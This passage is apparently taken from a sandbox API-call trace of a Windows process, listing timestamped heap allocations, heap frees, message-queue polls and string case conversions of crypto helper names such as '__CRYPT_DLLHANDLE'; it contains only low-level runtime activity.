0x8df028 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.981] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0171.982] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.982] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0171.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.984] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.984] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0171.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0171.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.985] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0171.987] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0171.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.987] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0171.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, 